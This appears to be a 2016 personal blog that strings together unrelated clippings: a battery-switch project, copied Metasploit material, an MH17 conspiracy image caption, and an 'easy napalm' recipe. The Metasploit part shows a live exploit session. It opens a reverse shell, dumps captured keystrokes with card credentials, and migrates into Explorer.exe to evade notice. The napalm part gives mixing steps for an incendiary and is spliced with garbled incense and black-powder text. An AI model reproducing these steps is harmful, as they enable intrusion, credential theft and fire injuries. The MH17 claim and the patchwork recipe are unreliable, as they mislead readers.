Wednesday, March 16, 2016

Remote Power Control For Battery Powered Devices

DSCN0517.JPG
Thin conductors on both sides of a thin insulator are connected by wires to a remote switch. Slide it between the batteries. It breaks the connection until the switch is turned on.
http://www.instructables.com/id/Remote-Power-Control-For-Battery-Powered-Devices/

Tuesday, March 15, 2016

malicious Gh0st RAT process

svchost.exe
https://www.offensive-security.com/metasploit-unleashed/keylogging/
Finally, we start the keylogger, wait for some time and dump the output.
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
   tgoogle.cm my credit amex   myusernamthi     amexpasswordpassword

https://www.offensive-security.com/metasploit-unleashed/meterpreter-backdoor/
Using the metsvc backdoor, you can gain a Meterpreter shell at any point.
One word of warning here before we go any further. Metsvc as shown here requires no authentication. This means that anyone that gains access to the port could access your back door! This is not a good thing if you are conducting a penetration test, as this could be a significant risk. In a real world situation, you would either alter the source to require authentication, or filter out remote connections to the port through some other method.
First, we exploit the remote system and migrate to the ‘Explorer.exe’ process in case the user notices the exploited service is not responding and decides to kill it.
msf exploit(3proxy) > exploit

[*] Started reverse handler
[*] Trying target Windows XP SP2 - English...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.104:1983)

meterpreter > ps

Process list
============

    PID   Name                 Path
    ---   ----                 ----
    132   ctfmon.exe           C:\WINDOWS\system32\ctfmon.exe
    176   svchost.exe          C:\WINDOWS\system32\svchost.exe
    440   VMwareService.exe    C:\Program Files\VMware\VMware Tools\VMwareService.exe
    632   Explorer.EXE         C:\WINDOWS\Explorer.EXE
    796   smss.exe             \SystemRoot\System32\smss.exe
    836   VMwareTray.exe       C:\Program Files\VMware\VMware Tools\VMwareTray.exe
    844   VMwareUser.exe       C:\Program Files\VMware\VMware Tools\VMwareUser.exe
    884   csrss.exe            \??\C:\WINDOWS\system32\csrss.exe
    908   winlogon.exe         \??\C:\WINDOWS\system32\winlogon.exe
    952   services.exe         C:\WINDOWS\system32\services.exe
    964   lsass.exe            C:\WINDOWS\system32\lsass.exe
    1120  vmacthlp.exe         C:\Program Files\VMware\VMware Tools\vmacthlp.exe
    1136  svchost.exe          C:\WINDOWS\system32\svchost.exe
    1236  svchost.exe          C:\WINDOWS\system32\svchost.exe
    1560  alg.exe              C:\WINDOWS\System32\alg.exe
    1568  WZCSLDR2.exe         C:\Program Files\ANI\ANIWZCS2 Service\WZCSLDR2.exe
    1596  jusched.exe          C:\Program Files\Java\jre6\bin\jusched.exe
    1656  msmsgs.exe           C:\Program Files\Messenger\msmsgs.exe
    1748  spoolsv.exe          C:\WINDOWS\system32\spoolsv.exe
    1928  jqs.exe              C:\Program Files\Java\jre6\bin\jqs.exe
    2028  snmp.exe             C:\WINDOWS\System32\snmp.exe
    2840  3proxy.exe           C:\3proxy\bin\3proxy.exe
    3000  mmc.exe              C:\WINDOWS\system32\mmc.exe

meterpreter > migrate 632
[*] Migrating to 632...
[*] Migration completed successfully.

Saturday, March 12, 2016


This image shows what appears to be a fighter jet firing a missile at Malaysia Airlines Flight MH17 from a distance of about 700 meters (2,300 feet). The Boeing aircraft is about 209 feet long with a wingspan of 200 feet. The fighter jet is about 11 times the length of the Boeing away.

http://www.bollyn.com/

Thursday, March 10, 2016

EASY NAPALM

Materials that you will need:
Empty jar (I used a pickle jar, I also already have a little bit left from my last batch)
Stick (spoon, straw, etc.)
Citronella oil (Lighter's fluid will also work)  
oil is "Lemon scented"

Combustible base

  
  • Fuel and oxidizer mixtures: Charcoal or wood powder forms the fuel for the combustion. Gums such as Gum Arabic or Gum Tragacanth are used to bind the mixture together while an oxidizer such as sodium nitrate or potassium nitrate sustains the burning of the incense. Fragrant materials are combined into the base prior to formation as in the case of powdered incense materials or after formation as in the case of essential oils. The formula for the charcoal-based incense is superficially similar to black powder, though it lacks the sulfur. (SULFUR : ON CLEANING CELLS OF QUIMIOTERAPHY PILLS)

Chronic Haze Lemon Incense 500mgs 

Powdered Sugar

.1. Take the powdered sugar and pour about a cup into the jar. 

2. Now take the oil and pour about a 3/4 cup into the jar. 

3. Mix them together, add more oil or sugar as needed until you get a mixture that resembles whipped cream or butter. 

That's all there is to it


http://www.instructables.com/id/Easy-to-make-and-safer-to-breathe-Napalm/